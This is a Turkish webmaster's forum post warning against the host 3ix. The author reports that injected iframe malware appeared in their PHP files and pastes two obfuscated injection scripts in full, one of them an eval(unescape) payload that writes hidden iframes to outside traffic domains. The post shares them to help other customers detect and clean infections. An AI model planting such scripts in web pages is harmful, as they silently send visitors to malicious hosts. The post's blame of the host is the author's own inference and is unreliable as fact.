Sizleri bilgilendirmek insanlık vazifem olarak düşünüyorum.
Şu bir 3ix den kesinlikle host almayın.
Öncelikle adamlar php dosyasına virüs çakıyor.
Bu virüs iframe virüsü forumda çok tartışıldı pc ye bulaşıp girdiğimiz ftp lerden tüm sitelere bulaşıyormuş.
Benim gözlemlerim doğrulutusunda bu olay bende 3ix den olduğuna karar verdim.
Bilgisayarımda virüs yok kaspersky zaten tanıyor. Önce script hostgator da duruyordu, google webmasterda sorun felan olmuştu aldım 3ix e.
Oraya taşırken yaptığım işlem ftp den pc ye indirdim dosyaları, sonra 3ix e salladım ftp den. (filezilla)
Buraya kadar işlemi evde yaptım, sonra birgün iş yerinden bu sitemin kaynağını görüntüledim sayfanın en altında iframe kodu vardı bunu mesajın sonuna yazacağım. O kodlar neymiş diye dosyayı indirdim pc ye (iş yerinde nod32 var), önce kod neymiş felan dedim sildim attım geri ftp ye kayıp oldu.
sonra bugun o siteye ilk evden bağlandım kaspersky kendinden geçti trojan-downloader html.Iframe.bu diye ötüp durdu. Forumu araştırdım girdim cpanel dosya yöneticiden kodları editledim frameleri sildim.
Yalnız şuna dikkat: o kodu temizleyip ftp den yolladım demiştim.
Sonra bir hafta sonra ie ile bağlanıp kaynak görüntüledim baktım kodlar yoktu. Dediğim gibi 1 aydır bakmıyordum indexli değildi google'dan kontrol ediyordum index almışmı die. sonra o konuyu unuttum ve evden kaspersky fark etti o kodlar kendiliğinden geri gelmiş.
hostgator da halen dosyalar duruyor cpanel den girip baktım kodlar temiz.
Ayrıca bu virüs pc ye girmesi imkansız gibi birşey.
Kesinlikle formattan sonra nete bağlanmadan anti virüs kurarım.
Antivürs programınıda net açıkken kapalı tutmam. Yani bu virüs bende olsa tüm sitelerime bulaşırdı ama Hostgatordaki dosyalarım temiz, dreamhosttaki dosyalarımda temiz, arkadaşımın hostundaki sitedeki kodlarda temiz, diğer arkadaşımın hostundaki sitede temiz. (konu dışı: sanki burdan bir örümcek geçti:P
) Geriye bir tek soru kalıyor bu virüs nerden geldi bulaştı cevabım ise 3ix diyorum. Çünkü taşıma esnasında demiştim hostgatordan pc ye indirdim dosyaları dosyaları silmemişim
araştırdığım kadarıyla bu kodları pc de göremiyormuşuz felan o pcdeki dosyaları kasper taradı zaten temiz ben her ihtimale karşı başka hosta salladım panelden girip kodlara baktım temiz.İngilizcem iyi olsa o 3ix'e bunun hesabını çok pis ödeditirdim.
3ix deki sitenin birisinde bazı dosyalardaki virüs kod şu
<script>var gbp="<";var xmp="i";var qnakm=" ";var gamom="tmdwj='DZzIroL8' ihwkw='NuX1smbY' lowww='ZUnGJga7' yopeb='qaRACYAg' gcgeh='8Bq2cmje' bcmhw='oPyPUfJp' ardqs='eRlaYB4B' dheuo='sqikLiyv' ebiby='BCR52wO6' src=";var nuyxt="ame>";var pmnvi="/";var dyvfo=" ";var ujg="f";var scl="r";var blq="a";var uqhxj="bcyys='TIqFN5BS' edcki='wgUzbWn9' esoyt='uFekC4yJ' eamgv='gmP6H54x' ixtaw='2S2KreFj' hmhpi='tC6Jx9y4' kvqua='dmMKZaEa' gecyk='R3SAucCR' gxqsc='ZEtxpPZj' ";var txx="m";var dtb="e";var yjkki="width=42 ";var vpwld="hxxp://reddii.org/traffic/ft01";var qqivu="height=174 ";var quova="style='display:none'";var idwwv=vpwld+pmnvi;var vtupb="></ifr";document.write(gbp+xmp+ujg+scl+blq+txx+dtb+qnakm+gamom+idwwv+dyvfo+uqhxj+yjkki+qqivu+quova+vtupb+nuyxt);</script>hxxp://reddii.org/traffic burdaki xleri ben yaptım kimse tıklamasın die.
3ix deki diğer sitedeki kodlar şunlar:
<!-- o --><!-- c --><script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%39%37%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%78%2d%76%69%63%74%6f%72%79%2e%72%75%2f%66%6f%72%75%6d%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%39%39%36%38%38%29%2b%27%31%30%31%5c%27%20%77%69%64%74%68%3d%37%33%33%20%68%65%69%67%68%74%3d%31%33%36%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); </script>Şimdi ben kesin ve net olarak emin olmak için sizlerinde yardımını bekliyorum. 3ix de hostu olanlar lütfen cpanel den webftp den php dosyaların içine baksın sayfanın en altında bunlar varmı e varsada silin
. Bilgisayarınızda kaspersky ve nod32 antivirüs programı olduğu halde sitesinde bu kodlar var ise lütfen buraya yazınız.
Artı bu firmanın tek avantajı ucuz olması ve online teknik desteğinin olması.
Sunucuları pek hızlı deil.
Bazen çok yavaş.
Devamlı down.
Adamlara yavaş diyorum herif kendi pc sinden hızını test ediyor hızlı diyor.
Birazz düşündüm bunu nasıl morartırım die. Hemen aklıma iwebtool geldi, hemen girdim ping attım 400 ms çıktı herif birde utanmadan sonucu bana yazıyor onda da 500 ms çıkmış 500 ms çıktı normal problem yok diyor. Sen ne diyorsun, dalgamı geçiyorsun dedim sonra buna hostgatordan ve dreamdan site soyledim bak pinglere dedim şarşırdı kaldı. Sonraki gün yine aynı bağlandım devamlı online desteğe girdiğim için tanıyor dedi admine para cezası kestik yapıyor lütfen 1 hafta müsade edin dedi. şu aralar benim sitenin pingi normale indi.